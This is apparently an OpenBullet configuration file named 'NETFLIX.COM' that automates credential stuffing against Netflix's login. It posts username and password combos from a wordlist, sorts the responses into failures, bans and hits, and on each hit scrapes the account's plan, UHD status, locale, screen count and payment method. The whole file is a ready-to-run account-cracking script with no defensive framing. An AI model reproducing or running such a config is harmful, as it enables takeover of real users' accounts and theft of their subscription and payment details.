[SETTINGS]
{
  "Name": "NETFLIX.COM",
  "SuggestedBots": 1,
  "LastModified": "2018-10-21T12:27:13.3057479+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#get REQUEST GET "https://www.netflix.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept-Language: en-US;q=0.8,en;q=0.7" 
  HEADER "Host: www.netflix.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
#authURL PARSE "<SOURCE>" LR "authURL\" value=\"" "\"" Recursive=FALSE -> VAR "authURL" "" "" 
#post REQUEST POST "https://www.netflix.com/login" AutoRedirect=TRUE 
  CONTENT "userLoginId=<USER>&password=<PASS>&rememberMe=true&flow=websiteSignUp&mode=login&action=loginAction&withFields=rememberMe%2CnextPage%2CuserLoginId%2Cpassword%2CcountryCode%2CcountryIsoCode&authURL=<authURL>&nextPage=&showPassword=&countryCode=%2B1&countryIsoCode=US" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: www.netflix.com" 
  HEADER "Accept-Language: en-US;q=0.8,en;q=0.7" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/login" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK BanOn4XX=TRUE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Sorry, we can't find an account with this email address" 
    KEY "Incorrect password" 
    KEY "Sign up to start your membership" 
    KEY "Sorry" 
  KEYCHAIN Ban OR 
    KEY "We are having technical difficulties" 
REQUEST GET "https://www.netflix.com/youraccount" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Plan PARSE "<SOURCE>" LR "currentPlanName\":\"" "\"" Recursive=FALSE -> CAP "Plan" "" "" 
#UHD PARSE "<SOURCE>" LR "hasUHD\"" ",\"" Recursive=FALSE -> CAP "UHD" "" "" 
#Locale PARSE "<SOURCE>" LR "locale\":\"" "\"" Recursive=FALSE -> CAP "Locale" "" "" 
#Screens PARSE "<SOURCE>" LR "maxStreams\"" ",\"" Recursive=FALSE -> CAP "Screens" "" "" 
#paymentMethod PARSE "<SOURCE>" LR "paymentMethod\":\"" "\"" Recursive=FALSE -> CAP "paymentMethod" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "\"isActive\":true" 
    KEY "currentPlanName" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "No streaming plan" 
